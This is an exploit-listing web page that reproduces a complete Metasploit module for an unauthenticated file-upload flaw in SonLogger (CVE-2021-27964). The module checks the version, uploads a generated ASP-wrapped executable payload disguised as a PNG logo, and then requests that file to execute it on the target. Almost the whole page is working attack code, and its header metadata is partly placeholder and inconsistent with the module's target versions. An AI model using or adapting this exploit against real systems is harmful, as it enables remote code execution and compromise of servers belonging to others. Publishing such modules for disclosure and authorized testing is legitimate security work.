Advertisement






SonLogger 4.2.3.3 Shell Upload

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-03-16
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030095

Below is a copy:

SonLogger 4.2.3.3 Shell Upload
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonLogger Arbitrary File Upload Exploit',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload
          via insecure POST request. It has been tested on version < 6.4.1 in
          Windows 10 Enterprise.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Berkan Er <[email protected]>' # Vulnerability discovery, PoC and Metasploit module
          ],
        'References' =>
          [
            ['CVE', '2021-27964'],
            ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']
          ],

        'Platform' => ['win'],
        'Privileged' => false,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' =>
          [
            [
              'SonLogger < 6.4.1',
              {
                'Platform' => 'win'
              }
            ],
          ],
        'DisclosureDate' => '2021-03-01',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])
      ]
    )
  end

  def check_product_info
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
      'method' => 'POST',
      'data' => '',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language' => 'en-US,en;q=0.5',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )
  end

  def check
    begin
      res = check_product_info

      unless res
        return CheckCode::Unknown('Target is unreachable.')
      end

      unless res.code == 200
        return CheckCode::Unknown("Unexpected server response: #{res.code}")
      end

      version = Gem::Version.new(JSON.parse(res.body)['Version'])

      if version < Gem::Version.new('6.4.1')
        CheckCode::Vulnerable("SonLogger version #{version}")
      else
        CheckCode::Safe("SonLogger version #{version}")
      end
    rescue JSON::ParserError
      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
    end
  end

  def create_payload
    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end

  def exploit
    begin
      print_good('Generate Payload')
      data = create_payload

      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
      post_data = "--#{boundary}\r\n"
      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
      post_data << "Content-Type: image/png\r\n"
      post_data << "\r\n#{data}\r\n"
      post_data << "--#{boundary}\r\n"

      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'data' => post_data,
        'headers' => {
          'Accept' => 'application/json',
          'Accept-Language' => 'en-US,en;q=0.5',
          'X-Requested-With' => 'XMLHttpRequest'
        }
      )
      unless res
        fail_with(Failure::Unreachable, 'No response from server')
      end

      unless res.code == 200
        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
      end

      json_res = begin
        JSON.parse(res.body)
      rescue JSON::ParserError
        nil
      end

      if json_res.nil? || json_res['Message'] == 'Error in saving file'
        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
      end

      print_good('Payload has been uploaded')

      handler

      print_status('Executing payload...')
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
        'method' => 'GET'
      }, 5)
    end
  rescue StandardError
    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
  end
end
            

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum